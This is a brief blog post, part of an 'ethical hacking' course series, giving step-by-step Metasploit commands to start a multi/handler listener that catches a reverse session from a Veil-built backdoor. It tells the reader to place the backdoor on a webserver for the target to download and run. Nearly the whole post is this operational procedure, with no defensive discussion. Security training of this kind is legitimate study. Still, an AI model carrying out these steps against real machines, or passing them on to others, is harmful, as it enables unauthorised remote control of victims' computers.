Ethical Hacking - GAINING ACCESS(11)

CLIENT SIDE ATTACKS - Listening for connections

1. Run Metasploit

Move the backdoor file to the webserver folder. And download it on the target machine.

 

 

 

msfconsole

 

 

 

2. Use the handler module.

use exploit/multi/handler

 

3. Set payload.

set PAYLOAD[veil payload]

4. Set IP

set LHOST[your ip]

 

5. Set port

set LPORT[veil port]

 

6. exploit

 

 Waiting for a connection ...

Once run the backdoor file on the target machine, a session is established.

 

posted @ 2020-01-01 06:56  晨风_Eric  阅读(105)  评论(0编辑  收藏  举报